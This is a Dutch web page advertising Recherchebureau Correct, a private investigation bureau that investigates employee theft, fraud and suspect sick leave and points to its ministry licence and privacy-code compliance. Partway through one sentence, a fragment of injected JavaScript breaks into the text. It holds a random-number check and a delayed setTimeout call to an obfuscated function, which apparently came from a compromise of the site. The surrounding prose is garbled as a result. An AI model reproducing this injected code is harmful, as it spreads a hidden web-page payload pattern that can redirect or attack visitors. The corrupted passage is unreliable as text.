Recherchebureau Correct

Bedrijfsrecherche Correct Groep

Organisaties worden steeds vaker het slachtoffer van interne diefstal en fraude. Of het nu gaat om het wegnemen van geld of goederen, “eigen dingen” doen in de baas z’n tijd, tijdens (onterecht) ziekteverzuim bezigheden verrichten die haaks staan op de medische klachten – de werkgever is altijd de dupe.

Ondernemers die dergelijke zaken constateren, aarzelen vaak om actie te ondernemen. In de basis vertrouwen ze hun personeel; ze hopen dat het wangedrag vanzelf ophoudt. Ook willen ze geen onrust binnen de organisatie en laten ze daarom vaak lang de boel de boel. Meestal stoppen de wanpraktijken helaas niet, en gaan ze ten koste van de goede werksfeer en de motivatie van zowel management als medewerker.

Recherchebureau

Recherchebureau Correct kan u helpen bovengenoemde problemen aan te pakken en de goede werksfeer te herstellen en te handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andhaven. Als particulier recherchebureau zijn wij vanuit het Ministerie van Veiligheid en Justitie bevoegd onderzoeken uit te voeren naar het hierboven genoemde.

College Bescherming Persoonsgegevens

Wij zijn aangemeld bij het College Bescherming Persoonsgegevens. Onze onderzoeken worden uitgevoerd conform de Privacy Gedragscode en voldoen altijd aan de wettelijke voorschriften. Het feit dat wij beschikken over het (jaarlijks door N’Lloyd getoetste) Keurmerk van de Branchevereniging van Particuliere Onderzoeksbureaus is uw bewijs dat u zaken doet met een deskundig en integer particulier recherchebureau.

Onze medewerkers hebben ruime ervaring op het gebied van onderzoeks-, opsporings- en observatiewerkzaamheden en zijn gescreend door de politie. Van elk uitgevoerd onderzoek ontvangt u een uitgebreide rapportage, die een belangrijk hulpmiddel kan zijn om de waarheid aan het licht te brengen.

Meer weten?

Neem dan contact op met Correct Beveiliging.